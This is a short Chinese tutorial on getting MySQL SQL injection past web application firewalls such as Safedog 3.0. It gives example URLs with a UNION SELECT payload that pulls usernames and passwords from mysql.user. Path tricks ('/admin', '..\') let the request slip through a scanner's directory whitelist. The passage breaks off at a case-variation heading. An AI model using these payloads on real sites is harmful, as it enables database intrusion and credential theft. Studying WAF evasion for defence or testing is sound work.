mysql 敏感字符绕过_waf绕过方法

waf简介：网站WAF是一款服务器安全防护软件，是为IDC运营商、虚拟主机服务商、企业主机、服务器管理者等用户提供服务器安全防范的实用系统，是集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。常见的系统攻击分为两类：一是利用Web服务器的漏洞进行攻击，如DDOS攻击、病毒木马破坏等攻击；二是利用网页自身的安全漏洞进行攻击，如SQL注入攻击、跨站脚本攻击等。常见攻击方式对网站服务器带来的危害主要集中在病毒木马破坏、网页非法篡改、各类网络攻击带来的威胁。

以下都是用安全狗3.0测试的奥。(很多4.0都已经绕不过去了，重在学习思路)

1、白名单绕过(注：现在基本都是自定义白名单，不是默认的啦)

360webscan脚本存在这个问题，就是判断是否为admin dede install等目录，如果是则不做拦截

比如：www.spisec.com/pen/news.php?id=1 union select user,password from mysql.user

可以改为:

www.spisec.com/pen/news.php/admin?id=1 union select user,password from mysql.user

或者

www.spisec.com/pen/admin/..\news.php?id=1 union select user,password from mysql.user

详细的见: http://www.wooyun.org/bugs/wooyun-2014-050576

2、大小写绕过

我这里虽然被拦截了但是有的waf是可以绕过的。